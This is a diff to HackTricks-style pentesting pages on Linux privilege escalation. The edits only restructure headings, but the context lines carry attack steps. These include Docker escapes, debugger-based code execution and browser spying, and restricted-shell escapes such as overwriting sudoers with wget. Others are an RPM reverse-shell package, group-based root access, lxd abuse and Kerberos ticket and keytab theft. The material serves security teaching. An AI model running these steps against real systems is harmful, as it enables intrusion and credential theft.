diff --git a/linux-unix/privilege-escalation/docker-breakout/seccomp.md b/linux-unix/privilege-escalation/docker-breakout/seccomp.md
index 4f40dc57..49da9313 100644
--- a/linux-unix/privilege-escalation/docker-breakout/seccomp.md
+++ b/linux-unix/privilege-escalation/docker-breakout/seccomp.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Seccomp
-
-## Basic Information
+# Basic Information
**Seccomp** or Secure Computing mode, in summary, is a feature of Linux kernel which can act as **syscall filter**.\
Seccomp has 2 modes.
@@ -30,7 +28,7 @@ seccomp mode is **enabled via the `prctl(2)` system call** using the `PR_SET_SEC
**seccomp-bpf** is an extension to seccomp that allows **filtering of system calls using a configurable policy** implemented using Berkeley Packet Filter rules. It is used by OpenSSH and vsftpd as well as the Google Chrome/Chromium web browsers on Chrome OS and Linux. (In this regard seccomp-bpf achieves similar functionality, but with more flexibility and higher performance, to the older systrace—which seems to be no longer supported for Linux.)
-### **Original/Strict Mode**
+## **Original/Strict Mode**
In this mode Seccomp **only allow the syscalls** `exit()`, `sigreturn()`, `read()` and `write()` to already-open file descriptors. If any other syscall is made, the process is killed using SIGKILL
@@ -68,7 +66,7 @@ int main(int argc, char **argv)
```
{% endcode %}
-### Seccomp-bpf
+## Seccomp-bpf
This mode allows f**iltering of system calls using a configurable policy** implemented using Berkeley Packet Filter rules.
@@ -122,7 +120,7 @@ void main(void) {
```
{% endcode %}
-## Seccomp in Docker
+# Seccomp in Docker
**Seccomp-bpf** is supported by **Docker** to restrict the **syscalls** from the containers effectively decreasing the surface area. You can find the **syscalls blocked** by **default** in [https://docs.docker.com/engine/security/seccomp/](https://docs.docker.com/engine/security/seccomp/) and the **default seccomp profile** can be found here [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json).\
You can run a docker container with a **different seccomp** policy with:
@@ -146,7 +144,7 @@ docker run -it --security-opt seccomp=default.json modified-ubuntu strace uname
If you are using **Docker just to launch an application**, you can **profile** it with **`strace`** and **just allow the syscalls** it needs
{% endhint %}
-### Example Seccomp policy
+## Example Seccomp policy
To illustrate Seccomp feature, let’s create a Seccomp profile disabling “chmod” system call as below.
@@ -178,7 +176,7 @@ Following output shows the “docker inspect” displaying the profile:
],
```
-### Deactivate it in Docker
+## Deactivate it in Docker
Launch a container with the flag: **`--security-opt seccomp=unconfined`**
diff --git a/linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md b/linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md
index 5e128736..e9e79e0f 100644
--- a/linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md
+++ b/linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md
@@ -16,9 +16,8 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## Node inspector/CEF debug abuse
-### Basic Information
+# Basic Information
When started with the `--inspect` switch, a Node.js process listens for a debugging client. By **default**, it will listen at host and port **`127.0.0.1:9229`**. Each process is also assigned a **unique** **UUID**.
@@ -56,7 +55,7 @@ When you start a debugged browser something like this will appear:
DevTools listening on ws://127.0.0.1:9222/devtools/browser/7d7aa9d9-7c61-4114-b4c6-fcf5c35b4369
```
-#### Browsers, WebSockets and same-origin policy
+## Browsers, WebSockets and same-origin policy
Websites open in a web-browser can make WebSocket and HTTP requests under the browser security model. An **initial HTTP connection** is necessary to **obtain a unique debugger session id**. The **same-origin-policy** **prevents** websites from being able to make **this HTTP connection**. For additional security against [**DNS rebinding attacks**](https://en.wikipedia.org/wiki/DNS\_rebinding)**,** Node.js verifies that the **'Host' headers** for the connection either specify an **IP address** or **`localhost`** or **`localhost6`** precisely.
@@ -64,7 +63,7 @@ Websites open in a web-browser can make WebSocket and HTTP requests under the br
This **security measures prevents exploiting the inspector** to run code by **just sending a HTTP request** (which could be done exploiting a SSRF vuln).
{% endhint %}
-#### Starting inspector in running processes
+## Starting inspector in running processes
You can send the **signal SIGUSR1** to a running nodejs process to make it **start the inspector** in the default port. However, note that you need to have enough privileges, so this might grant you **privileged access to information inside the process** but no a direct privilege escalation.
@@ -77,7 +76,7 @@ kill -s SIGUSR1
This is useful in containers because **shutting down the process and starting a new one** with `--inspect` is **not an option** because the **container** will be **killed** with the process.
{% endhint %}
-#### Connect to inspector/debugger
+## Connect to inspector/debugger
If you have access to a **Chromium base browser** you can connect accessing `chrome://inspect` or `edge://inspect` in Edge. Click the Configure button and ensure your **target host and port** are listed (Find an example in the following image of how to get RCE using one of the next sections examples).
@@ -107,7 +106,7 @@ The tool [**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefd
Note that **NodeJS RCE exploits won't work** if connected to a browser via [**Chrome DevTools Protocol**](https://chromedevtools.github.io/devtools-protocol/) \*\*\*\* (you need to check the API to find interesting things to do with it).
{% endhint %}
-### RCE in NodeJS Debugger/Inspector
+# RCE in NodeJS Debugger/Inspector
{% hint style="info" %}
If you came here looking how to get [**RCE from a XSS in Electron please check this page.**](../../pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/)
@@ -122,12 +121,12 @@ require('child_process').spawnSync('calc.exe')
Browser.open(JSON.stringify({url: "c:\\windows\\system32\\calc.exe"}))
```
-### Chrome DevTools Protocol Payloads
+# Chrome DevTools Protocol Payloads
You can check the API here: [https://chromedevtools.github.io/devtools-protocol/](https://chromedevtools.github.io/devtools-protocol/)\
In this section I will just list interesting things I find people have used to exploit this protocol.
-#### Overwrite Files
+## Overwrite Files
Change the folder where **downloaded files are going to be saved** and download a file to **overwrite** frequently used **source code** of the application with your **malicious code**.
@@ -143,11 +142,11 @@ ws.send(JSON.stringify({
}));
```
-#### Webdriver RCE and exfiltration
+## Webdriver RCE and exfiltration
According to this post: [https://medium.com/@knownsec404team/counter-webdriver-from-bot-to-rce-b5bfb309d148](https://medium.com/@knownsec404team/counter-webdriver-from-bot-to-rce-b5bfb309d148) it's possible to obtain RCE and exfiltrate internal pages from theriver.
-#### Post-Exploitation
+## Post-Exploitation
In a real environment and **after compromising** a user PC that uses Chrome/Chromium based browser you could launch a Chrome process with the **debugging activated and port-forward the debugging port** so you can access it. This way you will be able to **inspect everything the victim does with Chrome and steal sensitive information**.
@@ -157,7 +156,7 @@ The stealth way is to **terminate every Chrome process** and then call something
Start-Process "Chrome" "--remote-debugging-port=9222 --restore-last-session"
```
-### References
+# References
* [https://www.youtube.com/watch?v=iwR746pfTEc\&t=6345s](https://www.youtube.com/watch?v=iwR746pfTEc\&t=6345s)
* [https://github.com/taviso/cefdebug](https://github.com/taviso/cefdebug)
diff --git a/linux-unix/privilege-escalation/escaping-from-a-docker-container.md b/linux-unix/privilege-escalation/escaping-from-a-docker-container.md
index 16e0156a..856ce170 100644
--- a/linux-unix/privilege-escalation/escaping-from-a-docker-container.md
+++ b/linux-unix/privilege-escalation/escaping-from-a-docker-container.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Escaping from a Docker container
-
-## `--privileged` flag
+# `--privileged` flag
{% code title="Initial PoC" %}
```bash
@@ -80,7 +78,7 @@ Further, Docker [starts containers with the `docker-default` AppArmor](https://d
A container would be vulnerable to this technique if run with the flags: `--security-opt apparmor=unconfined --cap-add=SYS_ADMIN`
-### Breaking down the proof of concept
+## Breaking down the proof of concept
Now that we understand the requirements to use this technique and have refined the proof of concept exploit, let’s walk through it line-by-line to demonstrate how it works.
@@ -149,11 +147,11 @@ root 10 0.0 0.0 0 0 ? I 13:57 0:00 [rcu_sched]
root 11 0.0 0.0 0 0 ? S 13:57 0:00 [migration/0]
```
-## `--privileged` flag v2
+# `--privileged` flag v2
The previous PoCs work fine when the container is configured with a storage-driver which exposes the full host path of the mount point, for example `overlayfs`, however I recently came across a couple of configurations which did not obviously disclose the host file system mount point.
-### Kata Containers
+## Kata Containers
```text
root@container:~$ head -1 /etc/mtab
@@ -164,7 +162,7 @@ kataShared on / type 9p (rw,dirsync,nodev,relatime,mmap,access=client,trans=virt
\* More on Kata Containers in a future blog post.
-### Device Mapper
+## Device Mapper
```text
root@container:~$ head -1 /etc/mtab
@@ -173,13 +171,13 @@ root@container:~$ head -1 /etc/mtab
I saw a container with this root mount in a live environment, I believe the container was running with a specific `devicemapper` storage-driver configuration, but at this point I have been unable to replicate this behaviour in a test environment.
-### An Alternative PoC
+## An Alternative PoC
Obviously in these cases there is not enough information to identify the path of container files on the host file system, so Felix’s PoC cannot be used as is. However, we can still execute this attack with a little ingenuity.
The one key piece of information required is the full path, relative to the container host, of a file to execute within the container. Without being able to discern this from mount points within the container we have to look elsewhere.
-#### Proc to the Rescue
+### Proc to the Rescue
The Linux `/proc` pseudo-filesystem exposes kernel process data structures for all processes running on a system, including those running in different namespaces, for example within a container. This can be shown by running a command in a container and accessing the `/proc` directory of the process on the host:Container
@@ -229,7 +227,7 @@ findme
This changes the requirement for the attack from knowing the full path, relative to the container host, of a file within the container, to knowing the pid of _any_ process running in the container.
-#### Pid Bashing
+### Pid Bashing
This is actually the easy part, process ids in Linux are numerical and assigned sequentially. The `init` process is assigned process id `1` and all subsequent processes are assigned incremental ids. To identify the host process id of a process within a container, a brute force incremental search can be used:Container
@@ -249,7 +247,7 @@ root@host:~$ cat /proc/${COUNTER}/root/findme
findme
```
-#### Putting it All Together
+### Putting it All Together
To complete this attack the brute force technique can be used to guess the pid for the path `/proc//root/payload.sh`, with each iteration writing the guessed pid path to the cgroups `release_agent` file, triggering the `release_agent`, and seeing if an output file is created.
@@ -347,7 +345,7 @@ root 10 2 0 11:25 ? 00:00:00 [ksoftirqd/0]
...
```
-## Use containers securely
+# Use containers securely
Docker restricts and limits containers by default. Loosening these restrictions may create security issues, even without the full power of the `--privileged` flag. It is important to acknowledge the impact of each additional permission, and limit permissions overall to the minimum necessary.
@@ -362,7 +360,7 @@ To help keep containers secure:
* Use [official docker images](https://docs.docker.com/docker-hub/official_images/) or build your own based on them. Don’t inherit or use [backdoored](https://arstechnica.com/information-technology/2018/06/backdoored-images-downloaded-5-million-times-finally-removed-from-docker-hub/) images.
* Regularly rebuild your images to apply security patches. This goes without saying.
-## References
+# References
* [https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)
* [https://twitter.com/\_fel1x/status/1151487051986087936](https://twitter.com/_fel1x/status/1151487051986087936)
diff --git a/linux-unix/privilege-escalation/escaping-from-limited-bash.md b/linux-unix/privilege-escalation/escaping-from-limited-bash.md
index b06d61f2..2816fe0e 100644
--- a/linux-unix/privilege-escalation/escaping-from-limited-bash.md
+++ b/linux-unix/privilege-escalation/escaping-from-limited-bash.md
@@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Escaping from Jails
-
-## **GTFOBins**
+# **GTFOBins**
**Search in** [**https://gtfobins.github.io/**](https://gtfobins.github.io) **if you can execute any binary with "Shell" property**
-## Chroot limitation
+# Chroot limitation
From [wikipedia](https://en.wikipedia.org/wiki/Chroot#Limitations): The chroot mechanism is **not intended to defend** against intentional tampering by **privileged** (**root**) **users**. On most systems, chroot contexts do not stack properly and chrooted programs **with sufficient privileges may perform a second chroot to break out**.
@@ -76,9 +74,9 @@ chroot ".";
system("/bin/bash");
```
-## Bash Jails
+# Bash Jails
-### Enumeration
+## Enumeration
Get info about the jail:
@@ -90,7 +88,7 @@ export
pwd
```
-### Modify PATH
+## Modify PATH
Check if you can modify the PATH env variable
@@ -100,14 +98,14 @@ PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin #Try to change
echo /home/* #List directory
```
-### Using vim
+## Using vim
```bash
:set shell=/bin/sh
:shell
```
-### Create script
+## Create script
Check if you can create an executable file with _/bin/bash_ as content
@@ -116,7 +114,7 @@ red /bin/bash
> w wx/path #Write /bin/bash in a writable and executable path
```
-### Get bash from SSH
+## Get bash from SSH
If you are accessing via ssh you can use this trick to execute a bash shell:
@@ -126,7 +124,7 @@ ssh user@ -t "bash --noprofile -i"
ssh user@ -t "() { :; }; sh -i "
```
-### Declare
+## Declare
```bash
declare -n PATH; export PATH=/bin;bash -i
@@ -134,7 +132,7 @@ declare -n PATH; export PATH=/bin;bash -i
BASH_CMDS[shell]=/bin/bash;shell -i
```
-### Wget
+## Wget
You can overwrite for example sudoers file
@@ -142,7 +140,7 @@ You can overwrite for example sudoers file
wget http://127.0.0.1:8080/sudoers -O /etc/sudoers
```
-### Other tricks
+## Other tricks
[**https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/**](https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/)\
[https://pen-testing.sans.org/blog/2012/0**b**6/06/escaping-restricted-linux-shells](https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells**]\(https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells)\
@@ -153,7 +151,7 @@ wget http://127.0.0.1:8080/sudoers -O /etc/sudoers
[bypass-bash-restrictions.md](../useful-linux-commands/bypass-bash-restrictions.md)
{% endcontent-ref %}
-## Python Jails
+# Python Jails
Tricks about escaping from python jails in the following page:
@@ -161,7 +159,7 @@ Tricks about escaping from python jails in the following page:
[bypass-python-sandboxes](../../misc/basic-python/bypass-python-sandboxes/)
{% endcontent-ref %}
-## Lua Jails
+# Lua Jails
In this page you can find the global functions you have access to inside lua: [https://www.gammon.com.au/scripts/doc.php?general=lua\_base](https://www.gammon.com.au/scripts/doc.php?general=lua\_base)
diff --git a/linux-unix/privilege-escalation/exploiting-yum.md b/linux-unix/privilege-escalation/exploiting-yum.md
index d75fe46d..2e57fa9d 100644
--- a/linux-unix/privilege-escalation/exploiting-yum.md
+++ b/linux-unix/privilege-escalation/exploiting-yum.md
@@ -16,18 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Exploiting Yum
Further examples around yum can also be found on [gtfobins](https://gtfobins.github.io/gtfobins/yum/).
-## Executing arbitrary commands via RPM Packages
-### Checking the Environment
+# Executing arbitrary commands via RPM Packages
+## Checking the Environment
In order to leverage this vector the user must be able to execute yum commands as a higher privileged user, i.e. root.
-#### A working example of this vector
+### A working example of this vector
A working example of this exploit can be found in the [daily bugle](https://tryhackme.com/room/dailybugle) room on [tryhackme](https://tryhackme.com).
-### Packing an RPM
+## Packing an RPM
In the following section, I will cover packaging a reverse shell into an RPM using [fpm](https://github.com/jordansissel/fpm).
The example below creates a package that includes a before-install trigger with an arbitrary script that can be defined by the attacker. When installed, this package will execute the arbitrary command. I've used a simple reverse netcat shell example for demonstration but this can be changed as necessary.
@@ -40,7 +38,7 @@ echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR
```
-## Catching a shell
+# Catching a shell
Using the above example and assuming `yum` can be executed as a higher-privileged user.
1. **Transfer** the rpm to the host
diff --git a/linux-unix/privilege-escalation/interesting-groups-linux-pe.md b/linux-unix/privilege-escalation/interesting-groups-linux-pe.md
index 59358e6e..ef4529b4 100644
--- a/linux-unix/privilege-escalation/interesting-groups-linux-pe.md
+++ b/linux-unix/privilege-escalation/interesting-groups-linux-pe.md
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Interesting Groups - Linux PE
+# Sudo/Admin Groups
-## Sudo/Admin Groups
-
-### **PE - Method 1**
+## **PE - Method 1**
**Sometimes**, **by default \(or because some software needs it\)** inside the **/etc/sudoers** file you can find some of these lines:
@@ -41,7 +39,7 @@ If this is the case, to **become root you can just execute**:
sudo su
```
-### PE - Method 2
+## PE - Method 2
Find all suid binaries and check if there is the binary **Pkexec**:
@@ -89,7 +87,7 @@ pkttyagent --process #Step 2, attach pkttyagent to session1
```
{% endcode %}
-## Wheel Group
+# Wheel Group
**Sometimes**, **by default** inside the **/etc/sudoers** file you can find this line:
@@ -105,7 +103,7 @@ If this is the case, to **become root you can just execute**:
sudo su
```
-## Shadow Group
+# Shadow Group
Users from the **group shadow** can **read** the **/etc/shadow** file:
@@ -115,7 +113,7 @@ Users from the **group shadow** can **read** the **/etc/shadow** file:
So, read the file and try to **crack some hashes**.
-## Disk Group
+# Disk Group
This privilege is almost **equivalent to root access** as you can access all the data inside of the machine.
@@ -138,7 +136,7 @@ debugfs: dump /tmp/asd1.txt /tmp/asd2.txt
However, if you try to **write files owned by root** \(like `/etc/shadow` or `/etc/passwd`\) you will have a "**Permission denied**" error.
-## Video Group
+# Video Group
Using the command `w` you can find **who is logged on the system** and it will show an output like the following one:
@@ -165,7 +163,7 @@ Then modify the Width and Height to the ones used on the screen and check differ
-## Root Group
+# Root Group
It looks like by default **members of root group** could have access to **modify** some **service** configuration files or some **libraries** files or **other interesting things** that could be used to escalate privileges...
@@ -175,7 +173,7 @@ It looks like by default **members of root group** could have access to **modify
find / -group root -perm -g=w 2>/dev/null
```
-## Docker Group
+# Docker Group
You can mount the root filesystem of the host machine to an instance’s volume, so when the instance starts it immediately loads a `chroot` into that volume. This effectively gives you root on the machine.
@@ -183,7 +181,7 @@ You can mount the root filesystem of the host machine to an instance’s volume,
{% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %}
-## lxc/lxd Group
+# lxc/lxd Group
[lxc - Privilege Escalation](lxd-privilege-escalation.md)
diff --git a/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md b/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md
index c83132cb..59bfdd01 100644
--- a/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md
+++ b/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Interesting Groups - Linux PE
+# Sudo/Admin Groups
-## Sudo/Admin Groups
-
-### **PE - Method 1**
+## **PE - Method 1**
**Sometimes**, **by default (or because some software needs it)** inside the **/etc/sudoers** file you can find some of these lines:
@@ -41,7 +39,7 @@ If this is the case, to **become root you can just execute**:
sudo su
```
-### PE - Method 2
+## PE - Method 2
Find all suid binaries and check if there is the binary **Pkexec**:
@@ -89,7 +87,7 @@ pkttyagent --process #Step 2, attach pkttyagent to session1
```
{% endcode %}
-## Wheel Group
+# Wheel Group
**Sometimes**, **by default** inside the **/etc/sudoers** file you can find this line:
@@ -105,7 +103,7 @@ If this is the case, to **become root you can just execute**:
sudo su
```
-## Shadow Group
+# Shadow Group
Users from the **group shadow** can **read** the **/etc/shadow** file:
@@ -115,7 +113,7 @@ Users from the **group shadow** can **read** the **/etc/shadow** file:
So, read the file and try to **crack some hashes**.
-## Disk Group
+# Disk Group
This privilege is almost **equivalent to root access** as you can access all the data inside of the machine.
@@ -139,7 +137,7 @@ debugfs: dump /tmp/asd1.txt /tmp/asd2.txt
However, if you try to **write files owned by root** (like `/etc/shadow` or `/etc/passwd`) you will have a "**Permission denied**" error.
-## Video Group
+# Video Group
Using the command `w` you can find **who is logged on the system** and it will show an output like the following one:
@@ -166,7 +164,7 @@ Then modify the Width and Height to the ones used on the screen and check differ
.png>)
-## Root Group
+# Root Group
It looks like by default **members of root group** could have access to **modify** some **service** configuration files or some **libraries** files or **other interesting things** that could be used to escalate privileges...
@@ -176,7 +174,7 @@ It looks like by default **members of root group** could have access to **modify
find / -group root -perm -g=w 2>/dev/null
```
-## Docker Group
+# Docker Group
You can **mount the root filesystem of the host machine to an instance’s volume**, so when the instance starts it immediately loads a `chroot` into that volume. This effectively gives you root on the machine.
@@ -204,18 +202,18 @@ If you have write permissions over the docker socket read [**this post about how
{% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %}
-## lxc/lxd Group
+# lxc/lxd Group
{% content-ref url="./" %}
[.](./)
{% endcontent-ref %}
-## Adm Group
+# Adm Group
Usually **members** of the group **`adm`** have permissions to **read log** files located inside _/var/log/_.\
Therefore, if you have compromised a user inside this group you should definitely take a **look to the logs**.
-## Auth group
+# Auth group
Inside OpenBSD the **auth** group usually can write in the folders _**/etc/skey**_ and _**/var/db/yubikey**_ if they are used.\
These permissions may be abused with the following exploit to **escalate privileges** to root: [https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot](https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot)
diff --git a/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md b/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md
index 49953538..e4ef8fa4 100644
--- a/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md
+++ b/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md
@@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# lxd/lxc Group - Privilege escalation
-
If you belong to _**lxd**_ **or** _**lxc**_ **group**, you can become root
-## Exploiting without internet
+# Exploiting without internet
-### Method 1
+## Method 1
You can install in your machine this distro builder: [https://github.com/lxc/distrobuilder ](https://github.com/lxc/distrobuilder)(follow the instructions of the github):
@@ -76,7 +74,7 @@ lxc exec privesc /bin/sh
[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted
```
-### Method 2
+## Method 2
Build an Alpine image and start it using the flag `security.privileged=true`, forcing the container to interact as root with the host filesystem.
@@ -106,7 +104,7 @@ lxc exec mycontainer /bin/sh
Alternatively [https://github.com/initstring/lxd\_root](https://github.com/initstring/lxd\_root)
-## With internet
+# With internet
You can follow [these instructions](https://reboare.github.io/lxd/lxd-escape.html).
@@ -118,7 +116,7 @@ lxc exec test bash
[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted
```
-## Other Refs
+# Other Refs
{% embed url="https://reboare.github.io/lxd/lxd-escape.html" %}
diff --git a/linux-unix/privilege-escalation/ld.so.conf-example.md b/linux-unix/privilege-escalation/ld.so.conf-example.md
index 7e99f647..cc81d520 100644
--- a/linux-unix/privilege-escalation/ld.so.conf-example.md
+++ b/linux-unix/privilege-escalation/ld.so.conf-example.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# ld.so exploit example
-
-## Prepare the environment
+# Prepare the environment
In the following section you can find the code of the files we are going to use to prepare the environment
@@ -62,7 +60,7 @@ void say_hi()
3. **Copy **_ libcustom.so_ to _/usr/lib_: `sudo cp libcustom.so /usr/lib` (root privs)
4. **Compile** the **executable**: `gcc sharedvuln.c -o sharedvuln -lcustom`
-### Check the environment
+## Check the environment
Check that _libcustom.so_ is being **loaded** from _/usr/lib_ and that you can **execute** the binary.
@@ -78,7 +76,7 @@ Welcome to my amazing application!
Hi
```
-## Exploit
+# Exploit
In this scenario we are going to suppose that **someone has created a vulnerable entry** inside a file in _/etc/ld.so.conf/_:
@@ -130,12 +128,12 @@ ubuntu
Note that in this example we haven't escalated privileges, but modifying the commands executed and **waiting for root or other privileged user to execute the vulnerable binary** we will be able to escalate privileges.
{% endhint %}
-### Other misconfigurations - Same vuln
+## Other misconfigurations - Same vuln
In the previous example we faked a misconfiguration where an administrator **set a non-privileged folder inside a configuration file inside `/etc/ld.so.conf.d/`**.\
But there are other misconfigurations that can cause the same vulnerability, if you have **write permissions** in some **config file** inside `/etc/ld.so.conf.d`s, in the folder `/etc/ld.so.conf.d` or in the file `/etc/ld.so.conf` you can configure the same vulnerability and exploit it.
-## Exploit 2
+# Exploit 2
**Suppose you have sudo privileges over `ldconfig`**.\
You can indicate `ldconfig` **where to load the conf files from**, so we can take advantage of it to make `ldconfig` load arbitrary folders.\
@@ -166,7 +164,7 @@ ldd sharedvuln
I **didn't find** a reliable way to exploit this vuln if `ldconfig` is configured with the **suid bit**. The following error appear: `/sbin/ldconfig.real: Can't create temporary cache file /etc/ld.so.cache~: Permission denied`
{% endhint %}
-## References
+# References
* [https://www.boiteaklou.fr/Abusing-Shared-Libraries.html](https://www.boiteaklou.fr/Abusing-Shared-Libraries.html)
* [https://blog.pentesteracademy.com/abusing-missing-library-for-privilege-escalation-3-minute-read-296dcf81bec2](https://blog.pentesteracademy.com/abusing-missing-library-for-privilege-escalation-3-minute-read-296dcf81bec2)
diff --git a/linux-unix/privilege-escalation/linux-active-directory.md b/linux-unix/privilege-escalation/linux-active-directory.md
index a95d46d5..7c18896b 100644
--- a/linux-unix/privilege-escalation/linux-active-directory.md
+++ b/linux-unix/privilege-escalation/linux-active-directory.md
@@ -17,17 +17,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Linux Active Directory
-
A linux machine can also be present inside an Active Directory environment.
A linux machine in an AD might be **storing different CCACHE tickets inside files. This tickets can be used and abused as any other kerberos ticket**. In order to read this tickets you will need to be the user owner of the ticket or **root** inside the machine.
-### General enumeration
+## General enumeration
If you have access over an AD in linux (or bash in Windows) you can try [https://github.com/lefayjey/linWinPwn](https://github.com/lefayjey/linWinPwn) to enumerate the AD.
-### Pass The Ticket
+## Pass The Ticket
In this page you are going to find different places were you could **find kerberos tickets inside a linux host**, in the following page you can learn how to transform this CCache tickets formats to Kirbi (the format you need to use in Windows) and also how to perform a PTT attack:
@@ -35,7 +33,7 @@ In this page you are going to find different places were you could **find kerber
[pass-the-ticket.md](../../windows/active-directory-methodology/pass-the-ticket.md)
{% endcontent-ref %}
-### CCACHE ticket reuse from /tmp
+## CCACHE ticket reuse from /tmp
> When tickets are set to be stored as a file on disk, the standard format and type is a CCACHE file. This is a simple binary file format to store Kerberos credentials. These files are typically stored in /tmp and scoped with 600 permissions
@@ -50,7 +48,7 @@ krb5cc_1569901115
export KRB5CCNAME=/tmp/krb5cc_1569901115
```
-### CCACHE ticket reuse from keyring
+## CCACHE ticket reuse from keyring
Processes may **store kerberos tickets inside their memory**, this tool can be useful to extract those tickets (ptrace protection should be disabled in the machine `/proc/sys/kernel/yama/ptrace_scope`): [https://github.com/TarlogicSecurity/tickey](https://github.com/TarlogicSecurity/tickey)
@@ -72,7 +70,7 @@ make CONF=Release
[X] [uid:0] Error retrieving tickets
```
-### CCACHE ticket reuse from SSSD KCM
+## CCACHE ticket reuse from SSSD KCM
SSSD maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb`. The corresponding key is stored as a hidden file at the path `/var/lib/sss/secrets/.secrets.mkey`. By default, the key is only readable if you have **root** permissions.
@@ -85,7 +83,7 @@ python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey
The **credential cache Kerberos blob can be converted into a usable Kerberos CCache** file that can be passed to Mimikatz/Rubeus.
-### CCACHE ticket reuse from keytab
+## CCACHE ticket reuse from keytab
```bash
git clone https://github.com/its-a-feature/KeytabParser
@@ -93,7 +91,7 @@ python KeytabParser.py /etc/krb5.keytab
klist -k /etc/krb5.keytab
```
-### Extract accounts from /etc/krb5.keytab
+## Extract accounts from /etc/krb5.keytab
The service keys used by services that run as root are usually stored in the keytab file **`/etc/krb5.keytab`**. This service key is the equivalent of the service's password, and must be kept secure.
@@ -134,7 +132,7 @@ $ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "31d6cfe0d16ae931b73c59d7e0c089c
CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae931b73c59d7e0c089c0
```
-## References
+# References
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#linux-active-directory](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#linux-active-directory)
diff --git a/linux-unix/privilege-escalation/linux-capabilities.md b/linux-unix/privilege-escalation/linux-capabilities.md
index da95d2b3..00d95f41 100644
--- a/linux-unix/privilege-escalation/linux-capabilities.md
+++ b/linux-unix/privilege-escalation/linux-capabilities.md
@@ -16,17 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## What are Capabilities
Linux capabilities **provide a subset of the available root privileges** to a process. This effectively breaks up root privileges into smaller and distinctive units. Each of these units can then be independently be granted to processes. This way the full set of privileges is reduced and decreasing the risks of exploitation.
-### Why capabilities?
+# Why capabilities?
To better understand how Linux capabilities work, let’s have a look first at the problem it tries to solve.
Let’s assume we are running a process as a normal user. This means we are non-privileged. We can only access data that owned by us, our group, or which is marked for access by all users. At some point in time, our process needs a little bit more permissions to fulfill its duties, like opening a network socket. The problem is that normal users can not open a socket, as this requires root permissions.
-### Capabilities Sets
+# Capabilities Sets
**Inherited capabilities**
@@ -45,9 +44,9 @@ For a detailed explanation of the difference between capabilities in threads and
* [https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work](https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work)
* [https://blog.ploetzli.ch/2014/understanding-linux-capabilities/](https://blog.ploetzli.ch/2014/understanding-linux-capabilities/)
-### Processes & Binaries Capabilities
+# Processes & Binaries Capabilities
-#### Processes Capabilities
+## Processes Capabilities
To see the capabilities for a particular process, use the **status** file in the /proc directory. As it provides more details, let’s limit it only to the information related to Linux capabilities.\
Note that for all running processes capability information is maintained per thread, for binaries in the file system it’s stored in extended attributes.
@@ -128,7 +127,7 @@ $ capsh --decode=0000000000003000
As you can see the given capabilities corresponds with the results of the 2 ways of getting the capabilities of a binary.\
The _getpcaps_ tool uses the **capget()** system call to query the available capabilities for a particular thread. This system call only needs to provide the PID to obtain more information.
-#### Binaries Capabilities
+## Binaries Capabilities
Binaries can have capabilities that can be used while executing. For example, it's very common to find `ping` binary with `cap_net_raw` capability:
@@ -143,7 +142,7 @@ You can **search binaries with capabilities** using:
getcap -r / 2>/dev/null
